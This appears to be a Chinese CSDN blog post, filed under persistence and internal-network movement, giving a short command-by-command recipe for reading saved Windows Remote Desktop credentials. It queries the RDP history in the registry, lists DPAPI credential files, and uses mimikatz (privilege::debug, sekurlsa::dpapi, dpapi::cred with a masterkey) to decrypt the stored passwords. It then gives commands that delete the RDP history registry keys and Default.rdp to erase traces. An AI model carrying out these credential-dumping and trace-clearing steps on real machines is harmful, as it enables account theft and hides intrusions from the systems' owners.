读取mstsc历史密码

最新推荐文章于 2022-11-05 14:24:13 发布
最新推荐文章于 2022-11-05 14:24:13 发布
阅读量4.7k 收藏 4
点赞数 2
分类专栏: 权限维持 内网蠕动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/113873849
版权

读取mstsc历史密码

通过注册表查看历史记录

reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s

通过本地Credentials

读取记录

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

在这里插入图片描述

使用mimikatz读取密码(需要保存过凭证的才可以)

mimikatz dpapi::cred /in:C:\Users\xxxx\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6

通过获取到的guidMasterKey
在这里插入图片描述
来寻找MasterKey

mimikatz privilege::debug sekurlsa::dpapi

红色和上面的对应
在这里插入图片描述
masterkey下面要用到

mimikatz # dpapi::cred /in:C:\Users\xxx\AppData\Local\Microsoft\Credentials\EE1A4100890230A55C3C07FF6747BBF5 /masterkey:8f6e4ad433937955a7ee7d309798d08a44f1ea3c44b15725d37f834493644257e2f99c556e0fb1e81243c878168dc2dbe59a1310f189c90f67962ebf3072cfdb

在这里插入图片描述

日志清除

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f # 删除Default中的所有值
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f # 删除整个Servers
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 重新创建删除的注册表项
cd %userprofile%\documents\ # 转到Default.rdp文件目录
attrib Default.rdp -s -h # 更改Default.rdp文件属性,默认情况下它是隐藏
del Default.rdp  # 删除文件Default.rdp文件

参考文章

https://blog.csdn.net/q1352483315/article/details/100075078

whojoe
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
查看windows远程桌面保存密码
07-15
查看windows远程桌面保存密码
显示远程桌面连接密码-.rar
01-14
破解远程桌面连接密码好工具
mstsc密码保存在哪里_台式机宽带用户名和密码在哪看啊
weixin_39657825的博客
11-16 2226
写回答...看是用什么来拨号上网的。总体来说有4种看法。1、是电脑拨号的话,网上邻居——属性——宽带连接(看有没有保存上网的账号密码)电脑直接连接宽带上网的。2、路由器看法,浏览器——输入回车,进入路由器登陆对话框,账号密码普遍为admin admin若不对就查看路由器教程,没有上网搜索该路由器牌子。(牌子不同账号密码不同)然后进入——网络参数——WAN窗口就可以看到账号,不过密码不是明码。是一点...
远程桌面密码查看
09-08
远程桌面密码查看
获取windows10远程桌面记录的用户名密码
阿拉丁的知识分享库
06-06 4826
Windows 密码恢复工具双击netpass.exe,点击File,点击Advanced Options,按照如下图选择
Windows 远程连接记录获取
03-10 5909
简介 远程连接时,会将远程服务器的用户名和密码保存在本地的,所有可以通过解析相关文件,解密出相关凭证 本地获取 使用以下命令就可以查看本地保存的凭证,每个文件都是对应的一个远程连接的密码 dir /a %userprofile%\AppData\Local\Microsoft\Credentials\ mimikatz使用以下命令 privilege::debug dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Crede
mstsc保存用户名和密码,实现自动登录远程桌面
热门推荐
Run for the future!
06-02 5万+
mstsc保存用户名和密码,实现自动登录远程桌面首先可以使用mstsc /?来查看关于mstsc的参数说明根据上述的命令说明,我这里实现的bat文件为mstsc C:/a.rdp /console /v: xxx.xxx.xxx.xxx:3389 a.rdp内容screen mode id:i:1 desktopwidth:i:1280 desktopheight:i:750 session bpp:i:24 winposstr:s:2,3,188,8,1062,721 full add
Windows 10 远程桌面记住密码 (mstsc 怎么记住密码)
hwjmyz的博客
11-05 2948
远程桌面如何记住密码:进入控制面板的凭据管理器,新建普通凭据,地址:TERMSRV/服务器地址。然后填写用户名和密码即可。
远程桌面 Rdp文件的生成
weixin_30399871的博客
11-29 1085
最近由于项目需要,需要做一个rdp文件上成,然后可以直接连远程桌面的功能,在度娘和谷叔搜索一番,所得甚少。闲话少说,来点干货: 看看系统给提供的是啥样的 我们要关心得是 用户名和密码,其他参数可以慢慢了解,可是这个密码是怎么加密的呢? 使用的是一个win32里面一个叫crypt32.dll的CryptProtectData方法,好了,关键的时候来咯~~~~ [Struc...
远程桌面 mstsc 密码
06-08
远程桌面 mstsc 密码生成工具 网上说明的内容太多,我只想来个更简单的。通过输入地址,用户 和密码 即可 创建一个永久有效的远程连接了。
windows server 2008的 mstsc
06-30
win 10的mstsc砍掉了程序功能,这个mstsc主要是为了连接RemoteApp用的
mstsc mui
09-30
mstsc mui配置文件有需要的可以下载
mstsc-3389-rdp文件中密码的生成
03-03
先将之前登录的信息另存为RDP文件,在用记事本等文件打开在最下面加入下面两行。 username:s:你的用户名 password 51:b:软件算出的HASH值 保存后就可以直接双击打开了。
msf下MS17-010模块使用总结
whojoe的博客
06-20 1万+
msf下MS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章 前言 在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。 环境搭建 这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机 kali 192.168.164.155 靶机1 192.168.164.156 靶机2 192.168.164.161(丢一个360的安装包进去,等会要用) 靶机2还要开启命名管道的匿名访问 打开cmd 执行g
cve-2021-21985漏洞复现
whojoe的博客
06-09 6430
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
mssql堆叠注入利用总结
whojoe的博客
06-22 3114
mssql堆叠注入利用总结前言环境写webshellxp_dirtreexp_dirtree杀软反应xp_cmdshellxp_cmdshell杀软反应通过命令执行拿shell无杀软有杀软通过差异备份写shell有杀软log备份有杀软遇到的问题sp_oacreate无杀软有杀软参考文章 前言 前一段时间遇到了两个mssql的注入,一个是可以限制长度的命令执行,另一个是网站可以注入,但是主机存在杀软,不可以使用xp_cmdshell,所以总结一下mssql堆叠注入环境下的函数利用,以及杀软的反应 当然,下面的
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3026
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 域控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
linux加入域操作和linux在域下信息收集
whojoe的博客
03-06 2826
linux加入域操作和linux在域下信息收集环境搭建修改linux机器的dns修改hostname安装必须组件加入域linux在域下信息收集机器账户域账户查询域控机器查询域管账户查询所有域账户查看加入域的所有计算机总结 环境搭建 域控 win2008r2 192.168.164.169 linux centos7 192.168.164.179 域 whoami.com 现在已经有了一个域控,具体的方法可以自行搜索 修改linux机器的dns vim /etc/sysconfig/network-scr
pymysql.err.DataError: (1366, "Incorrect string value: '\\xF0\\x9F\\x9A\\xA9 2...' for column 'txt' at row 1")
最新发布
11-03
该错误提示是由于在向MySQL数据库插入数据时,数据中包含了MySQL不支持的字符集,导致插入失败。解决方法如下: 1. 修改MySQL表的字符集为utf8mb4,排序规则改为utf8mb4_bin,命令为:alter table TABLE_NAME convert to character set utf8mb4 collate utf8mb4_bin;(将TABLE_NAME替换成你的表名)。 2. 修改数据库连接的字符集为utf8mb4,例如:conn = pymysql.connect(host='localhost', user='root', password='root', port=3306, db='cncb',charset='utf8mb4')。 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值